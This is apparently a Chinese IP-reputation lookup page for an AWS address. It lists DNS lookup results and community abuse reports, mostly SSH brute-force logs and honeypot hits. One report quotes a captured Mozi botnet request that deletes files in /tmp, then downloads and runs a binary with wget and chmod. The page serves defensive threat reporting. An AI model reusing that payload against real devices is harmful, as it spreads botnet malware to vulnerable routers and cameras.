52.66.81.166 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): None

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

IP	类型	评论内容	时间
52.66.81.52	attackbots	Automatic report - XMLRPC Attack	2020-08-02 07:58:07
52.66.81.52	attackspam	Wordpress_xmlrpc_attack	2020-08-02 04:33:33
52.66.81.12	attack	(sshd) Failed SSH login from 52.66.81.12 (IN/India/ec2-52-66-81-12.ap-south-1.compute.amazonaws.com): 2 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Mar 30 05:55:33 ubnt-55d23 sshd[15297]: Invalid user healer from 52.66.81.12 port 36680 Mar 30 05:55:35 ubnt-55d23 sshd[15297]: Failed password for invalid user healer from 52.66.81.12 port 36680 ssh2	2020-03-30 13:34:33

类型

评论内容

时间

52.66.81.52

attackbots

Automatic report - XMLRPC Attack

2020-08-02 07:58:07

52.66.81.52

attackspam

Wordpress_xmlrpc_attack

2020-08-02 04:33:33

52.66.81.12

attack

(sshd) Failed SSH login from 52.66.81.12 (IN/India/ec2-52-66-81-12.ap-south-1.compute.amazonaws.com): 2 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Mar 30 05:55:33 ubnt-55d23 sshd[15297]: Invalid user healer from 52.66.81.12 port 36680
Mar 30 05:55:35 ubnt-55d23 sshd[15297]: Failed password for invalid user healer from 52.66.81.12 port 36680 ssh2

2020-03-30 13:34:33

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 52.66.81.166
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 16883
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;52.66.81.166.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025012901 1800 900 604800 86400

;; Query time: 13 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Jan 30 06:26:32 CST 2025
;; MSG SIZE  rcvd: 105

HOST信息:

166.81.66.52.in-addr.arpa domain name pointer ec2-52-66-81-166.ap-south-1.compute.amazonaws.com.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
166.81.66.52.in-addr.arpa	name = ec2-52-66-81-166.ap-south-1.compute.amazonaws.com.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
104.131.97.202	attackbotsspam	Automatic report - XMLRPC Attack	2020-09-12 00:23:24
203.163.244.6	attackspam	DATE:2020-09-10 18:54:56, IP:203.163.244.6, PORT:telnet Telnet brute force auth on honeypot server (honey-neo-dc)	2020-09-12 00:00:43
177.149.52.117	attack	Icarus honeypot on github	2020-09-12 00:11:42
85.99.211.209	attackspam	Icarus honeypot on github	2020-09-12 00:03:37
14.21.7.162	attackspambots	Sep 11 11:16:34 ns382633 sshd\[31617\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.21.7.162 user=root Sep 11 11:16:36 ns382633 sshd\[31617\]: Failed password for root from 14.21.7.162 port 26341 ssh2 Sep 11 11:17:22 ns382633 sshd\[31682\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.21.7.162 user=root Sep 11 11:17:24 ns382633 sshd\[31682\]: Failed password for root from 14.21.7.162 port 26343 ssh2 Sep 11 11:17:45 ns382633 sshd\[31706\]: Invalid user cn from 14.21.7.162 port 26344 Sep 11 11:17:45 ns382633 sshd\[31706\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.21.7.162	2020-09-12 00:04:29
202.83.42.72	attackspam	Port Scan: TCP/23	2020-09-12 00:31:45
202.83.42.235	attackbots	C2,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	2020-09-11 23:56:13
167.172.133.221	attack	TCP ports : 14302 / 23806	2020-09-12 00:20:20
119.45.50.126	attackbotsspam	Sep 11 09:18:21 Ubuntu-1404-trusty-64-minimal sshd\[26901\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.45.50.126 user=root Sep 11 09:18:23 Ubuntu-1404-trusty-64-minimal sshd\[26901\]: Failed password for root from 119.45.50.126 port 44734 ssh2 Sep 11 09:30:50 Ubuntu-1404-trusty-64-minimal sshd\[7043\]: Invalid user cecilia from 119.45.50.126 Sep 11 09:30:50 Ubuntu-1404-trusty-64-minimal sshd\[7043\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.45.50.126 Sep 11 09:30:53 Ubuntu-1404-trusty-64-minimal sshd\[7043\]: Failed password for invalid user cecilia from 119.45.50.126 port 46320 ssh2	2020-09-11 23:52:42
67.207.88.180	attack	firewall-block, port(s): 19372/tcp	2020-09-11 23:52:10
111.175.186.150	attackspam	Sep 11 13:42:54 plex-server sshd[859804]: Failed password for root from 111.175.186.150 port 3935 ssh2 Sep 11 13:44:15 plex-server sshd[860444]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.175.186.150 user=root Sep 11 13:44:17 plex-server sshd[860444]: Failed password for root from 111.175.186.150 port 42274 ssh2 Sep 11 13:47:09 plex-server sshd[861673]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.175.186.150 user=root Sep 11 13:47:12 plex-server sshd[861673]: Failed password for root from 111.175.186.150 port 55603 ssh2 ...	2020-09-11 23:55:09
114.4.227.194	attack	(sshd) Failed SSH login from 114.4.227.194 (ID/Indonesia/114-4-227-194.resources.indosat.com): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Sep 11 12:01:58 server sshd[1973]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.4.227.194 user=root Sep 11 12:02:00 server sshd[1973]: Failed password for root from 114.4.227.194 port 38556 ssh2 Sep 11 12:09:01 server sshd[3684]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.4.227.194 user=root Sep 11 12:09:03 server sshd[3684]: Failed password for root from 114.4.227.194 port 34654 ssh2 Sep 11 12:14:23 server sshd[5191]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.4.227.194 user=root	2020-09-12 00:16:32
68.168.213.251	attackspambots	2020-09-11T15:05:18.989284server.espacesoutien.com sshd[32383]: Invalid user admin from 68.168.213.251 port 59840 2020-09-11T15:05:19.001673server.espacesoutien.com sshd[32383]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=68.168.213.251 2020-09-11T15:05:18.989284server.espacesoutien.com sshd[32383]: Invalid user admin from 68.168.213.251 port 59840 2020-09-11T15:05:20.887945server.espacesoutien.com sshd[32383]: Failed password for invalid user admin from 68.168.213.251 port 59840 ssh2 ...	2020-09-12 00:16:51
167.71.111.16	attackspam	Automatic report - Banned IP Access	2020-09-12 00:06:32
222.186.180.6	attackspam	Sep 11 18:04:50 eventyay sshd[5354]: Failed password for root from 222.186.180.6 port 34238 ssh2 Sep 11 18:05:05 eventyay sshd[5354]: error: maximum authentication attempts exceeded for root from 222.186.180.6 port 34238 ssh2 [preauth] Sep 11 18:05:14 eventyay sshd[5356]: Failed password for root from 222.186.180.6 port 47882 ssh2 ...	2020-09-12 00:09:39

最近上报的IP列表

119.229.148.241	9.38.24.25	161.167.28.119	184.48.155.59
210.215.46.191	152.176.54.223	28.251.0.177	213.252.184.118
169.230.195.191	174.154.128.52	69.11.248.87	134.203.130.253
3.237.45.90	34.175.22.194	60.59.152.223	56.149.118.4
31.58.90.169	137.73.81.170	95.109.62.223	53.5.251.127